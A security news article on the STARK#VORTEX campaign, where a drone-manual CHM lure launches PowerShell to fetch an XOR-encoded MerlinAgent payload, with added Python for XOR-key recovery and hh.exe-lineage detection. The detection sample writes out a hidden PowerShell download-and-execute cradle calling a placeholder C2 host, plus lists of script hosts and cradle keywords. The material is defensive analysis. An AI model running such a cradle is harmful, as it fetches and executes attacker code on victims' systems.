STARK#VORTEX Cyber Attack Mechanism Exposed by Securonix Threat Labs
The latest report from Securonix Threat Labs examines the STARK#VORTEX attack chain, which uses drone operating instructions as a lure to deliver MerlinAgent, the agent component of the open-source Merlin command-and-control framework.
The attack begins with emails offering what looks like a free drone operating manual. The attachment, named "Information on BPLA for the military" (BPLA is the Ukrainian abbreviation for unmanned aerial vehicle), is a Microsoft Compiled HTML Help file (.chm). CHM is the legacy Windows help format: a compiled bundle of HTML pages that software vendors ship as user documentation, which is why a help file named like a manual does not look out of place.
When the recipient opens the file, the Windows help viewer (hh.exe) renders the embedded HTML page, and JavaScript in that page runs and launches PowerShell. The PowerShell code connects to a remote command-and-control (C2) server and downloads a binary blob.
That blob is XOR-decoded and assembled into the MerlinAgent payload, which then beacons to the C2 server.
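The decode stage in code, added here as an illustration and not taken from the Securonix report. The article states only that the downloaded blob is XOR-decoded, so the key lengths tried, the known-plaintext assumption (a standard DOS header at the start of the PE) and the constructed stand-in payload are all assumptions. It goes beyond the single case in the text by recovering the key when it is not known, which is the situation an analyst is usually in with a captured stage.

```python
"""Recover the XOR key of a staged PE payload and decode it.

Added example for this article, not code from the Securonix report. The
article only says the downloaded blob is XOR-decoded into MerlinAgent; the
single-byte and short repeating keys tried here and the constructed stand-in
payload are assumptions made for illustration.
"""
import struct
from typing import Optional, Tuple

# First 16 bytes of the DOS header written by common linkers (e_magic "MZ",
# e_cblp 0x90, e_cp 3, e_crlc 0, e_cparhdr 4, e_minalloc 0, e_maxalloc 0xffff).
# Used as known plaintext; assumes the payload carries a standard DOS stub.
STD_DOS_PREFIX = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Structural check: 'MZ' magic plus an e_lfanew that points at 'PE\\0\\0'.
    Checking the PE signature as well as 'MZ' rejects keys that happen to fix
    only the first two bytes."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_single_byte_key(blob: bytes) -> Optional[int]:
    """Brute-force all 256 single-byte keys; keep the one that yields a PE."""
    for key in range(256):
        if looks_like_pe(xor_bytes(blob, bytes([key]))):
            return key
    return None


def recover_repeating_key(blob: bytes, max_key_len: int = 16) -> Optional[bytes]:
    """Known-plaintext attack for a repeating key of up to max_key_len bytes:
    key[i] = blob[i] ^ STD_DOS_PREFIX[i]. The shortest key that validates wins,
    so a period-4 key is not reported as a period-8 key."""
    if len(blob) < max_key_len:
        return None
    for key_len in range(1, max_key_len + 1):
        key = bytes(blob[i] ^ STD_DOS_PREFIX[i] for i in range(key_len))
        if looks_like_pe(xor_bytes(blob, key)):
            return key
    return None


def decode_staged_payload(blob: bytes) -> Tuple[bytes, bytes]:
    """Return (key, decoded image), or raise if no candidate key yields a PE."""
    key = recover_repeating_key(blob)
    if key is None:
        raise ValueError("no XOR key of 1..16 bytes yields a PE image")
    return key, xor_bytes(blob, key)


def build_fake_pe(body: bytes) -> bytes:
    """Constructed stand-in for a PE image: standard DOS prefix, e_lfanew=0x80,
    'PE\\0\\0' signature, then an arbitrary body. Not a runnable executable."""
    header = bytearray(0x80)
    header[:len(STD_DOS_PREFIX)] = STD_DOS_PREFIX
    struct.pack_into("<I", header, 0x3C, 0x80)
    return bytes(header) + b"PE\x00\x00" + body


if __name__ == "__main__":
    image = build_fake_pe(b"MerlinAgent stand-in body (constructed)")
    staged = xor_bytes(image, b"\x13\x37\xc0\xde")  # what the loader would download
    key, decoded = decode_staged_payload(staged)
    print("key:", key.hex(), "decoded ok:", decoded == image)
```

Against a real capture, pass in the blob the PowerShell stage fetched. If recovery fails, either the DOS stub is non-standard or the encoding is more than plain XOR; the next place to look is the PowerShell code itself, which must contain the key in order to decode the payload.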
Although the chain looks simple, its implementation relies on layered obfuscation, which makes detection harder.
The researchers note that the files used in the attack slipped past security controls: antivirus scanners did not flag the malicious CHM file. A help file arriving from the internet would ordinarily raise suspicion, but the attackers disguised theirs as an innocuous guideline or reference document. Because the file itself evades signature scanning, the more reliable signal is behaviour: the help viewer hh.exe has no legitimate reason to spawn PowerShell, and that parent-child relationship is visible in process-creation telemetry regardless of how the CHM is named.
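A behaviour-based check for that chain, added here as an illustration and not taken from the Securonix report. It runs over constructed process-creation events (Sysmon-style ParentImage/Image/CommandLine field names; the paths, attachment file name and C2 host are made up) and flags the help viewer hh.exe spawning a script host, which is the step a file-level scanner that misses the CHM cannot hide.

```python
"""Behavioural detection for the CHM -> script host -> download chain, run
over constructed process-creation events (Sysmon Event ID 1 style fields).

Added example for this article, not a Securonix detection rule. The event
records, file names, paths and C2 host below are constructed; the field names
mirror Sysmon's, but any EDR telemetry with parent-child lineage carries the
same information.
"""
import re

# Interpreters that a help file should never have a reason to start.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Typical PowerShell download-cradle and evasion tokens.
DOWNLOAD_CRADLE = re.compile(
    r"net\.webclient|downloadstring|downloaddata|invoke-webrequest|\biwr\b"
    r"|\biex\b|invoke-expression|frombase64string|-enc\w*\s|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)

# Locations where a user-received file lands before it is opened.
USER_DROP_DIR = re.compile(r"\\(Downloads|Temp|INetCache|Content\.Outlook)\\",
                           re.IGNORECASE)

SEVERITY_ORDER = {"high": 0, "medium": 1, "low": 2}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events: list) -> list:
    """Return one alert per matching event, highest severity first."""
    alerts = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        image = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if parent == "hh.exe" and image in SCRIPT_HOSTS:
            # The core signal: the help viewer launching an interpreter.
            cradle = DOWNLOAD_CRADLE.search(cmd) is not None
            alerts.append({
                "rule": "hh_spawns_script_host",
                "severity": "high" if cradle else "medium",
                "event": ev["EventId"],
                "detail": f"{parent} -> {image}" + (" with download cradle" if cradle else ""),
            })
        elif image == "hh.exe" and re.search(r"\.chm\b", cmd, re.I) and USER_DROP_DIR.search(cmd):
            # Weaker, earlier signal: a help file opened from a download/mail location.
            alerts.append({
                "rule": "chm_opened_from_user_drop_dir",
                "severity": "low",
                "event": ev["EventId"],
                "detail": cmd,
            })
    alerts.sort(key=lambda a: SEVERITY_ORDER[a["severity"]])
    return alerts


# Constructed sample telemetry: two benign events and two from the attack chain.
SAMPLE_EVENTS = [
    {"EventId": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" "C:\Program Files\Vendor\Help\manual.chm"'},
    {"EventId": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" "C:\Users\analyst\Downloads\Info_on_BPLA_for_the_military.chm"'},
    {"EventId": 3, "ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://c2.invalid/stage')"},
    {"EventId": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["rule"], "event", alert["event"], "|", alert["detail"])
```

The lineage rule is the one worth paging on; the drop-directory rule is noise on its own but useful as context when it precedes the lineage hit by a few seconds on the same host. Tightening the cradle regex raises the severity more precisely, but the parent-child pair alone is already rare enough in normal telemetry to justify the medium alert.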
Once the agent is running and checking in, the attackers have full remote control of the victim's system.